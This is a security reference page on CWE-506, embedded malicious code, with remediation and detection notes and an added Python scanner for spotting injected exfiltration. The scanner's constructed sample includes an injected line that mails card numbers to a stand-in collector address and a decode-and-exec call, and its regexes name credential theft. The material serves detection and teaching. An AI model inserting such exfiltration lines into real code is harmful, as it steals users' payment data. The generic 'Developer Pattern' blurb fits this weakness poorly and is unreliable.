CWE-506: Embedded Malicious Code
Official CWE-506 CWE context with Glexia analysis, remediation guidance, related CVEs, and ATT&CK context.
Glexia's Take
CWE-506: Embedded Malicious Code
Embedded Malicious Code represents a recurring weakness pattern that can create exploitable paths when design, validation, or implementation controls are missing.
Executive Impact
- Confidentiality, Integrity, Availability: Execute Unauthorized Code or Commands
Developer Pattern
CWE-506 is the kind of defect developers can usually prevent with explicit validation, safer framework defaults, and tests that exercise hostile input or unsafe state transitions.
Confidence
High confidence, based on CWE-506 as published in CWE version 4.20.
Official CWE Definition
CWE-506: Embedded Malicious Code
The product contains code that appears to be malicious in nature.
Malicious flaws have acquired colorful names, including Trojan horse, trapdoor, timebomb, and logic-bomb. A developer might insert malicious code with the intent to subvert the security of a product or its host system at some time in the future. It generally refers to a program that performs a useful service but exploits rights of the program's user in a way the user does not intend.
Developer And Remediation Guidance
How teams prevent and detect this weakness
Causes
- In CWE's demonstrative example for this weakness, a malicious developer has injected code that sends credit card numbers to the developer's own email address.
Remediation
- Implementation,Operation: Remove the malicious code and start an effort to ensure that no more malicious code exists. This may require a detailed review of all code, as it is possible to hide a serious attack in only one or two lines of code. These lines may be located almost anywhere in an application and may have been intentionally obfuscated by the attacker.
Detection
- Manual Static Analysis - Binary or Bytecode
- Dynamic Analysis with Manual Results Interpretation
- Manual Static Analysis - Source Code
- Automated Static Analysis
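The remediation note above says a serious attack can hide in one or two lines anywhere in the code base, which is what makes the detection methods listed here worthwhile as a first pass before manual review. The following added example (not from CWE or Glexia) is a small automated static-analysis heuristic that flags two shapes the CWE text describes: sensitive-looking data handed to a network or mail call with a hard-coded destination nearby, and a long encoded literal fed to a decode or exec call. The regexes and the Java-like sample are constructed for this example; they are a triage aid, not a substitute for the manual code review the guidance calls for.

```python
import re
from dataclasses import dataclass

# Heuristic patterns (assumptions for this example, not a CWE-published ruleset).
DESTINATION = re.compile(r"[\w.+-]+@[\w-]+\.\w+|https?://\S+|\b(?:\d{1,3}\.){3}\d{1,3}\b")
NETWORK_CALL = re.compile(r"\b(?:send|mail|post|connect|upload|transmit|urlopen|socket)\w*\s*\(", re.I)
SENSITIVE = re.compile(r"card|cvv|ssn|password|passwd|secret|token|credential", re.I)
ENCODED_BLOB = re.compile(r"[\"']([A-Za-z0-9+/=]{40,})[\"']")
DECODE_EXEC = re.compile(r"\b(?:decode|eval|exec|unhexlify|Base64|Runtime|getDeclaredMethod)\w*", re.I)

@dataclass
class Finding:
    line_no: int
    reason: str
    text: str

def scan_source(source: str, window: int = 3) -> list[Finding]:
    """Flag (a) sensitive-looking data passed to a network/mail call with a
    hard-coded destination on the same or `window` preceding lines, and
    (b) a decode/exec call with a long encoded literal in that same window.
    Comment lines are blanked so maintainer e-mails in headers do not fire."""
    lines = source.splitlines()
    code = ["" if l.lstrip().startswith(("//", "#", "*", "/*")) else l for l in lines]
    findings: list[Finding] = []
    for i, line in enumerate(code, 1):
        context = "\n".join(code[max(0, i - 1 - window): i])
        if NETWORK_CALL.search(line) and SENSITIVE.search(line) and DESTINATION.search(context):
            findings.append(Finding(i, "sensitive data sent to hard-coded destination", lines[i - 1].strip()))
        if DECODE_EXEC.search(line) and ENCODED_BLOB.search(context):
            findings.append(Finding(i, "long encoded literal fed to decode/exec", lines[i - 1].strip()))
    return findings

# Constructed sample mirroring CWE-506's demonstrative example: a payment routine
# with two injected lines. This is not the CWE's own code.
SAMPLE = """\
// Maintainer: dev@example.com (comment: must not fire by itself)
public void processPayment(Card card) {
    validate(card);
    charge(card);
    Mailer.sendMail("devbox@collector.example", card.getNumber());
    String cfg = "QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xt";
    Runtime.getRuntime().exec(new String(Base64.getDecoder().decode(cfg)));
}
"""

if __name__ == "__main__":
    for f in scan_source(SAMPLE):
        print(f"line {f.line_no}: {f.reason}: {f.text}")
```

Run over a real tree, expect noise from legitimate mailers and config loaders; the value is in the short list of hits a reviewer then reads by hand, as the Remediation entry recommends.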
Mappings
Related CVEs, CWEs, and ATT&CK context
Related CWEs
ATT&CK Relevance
ATT&CK relevance is shown only when reviewed or responsibly inferred.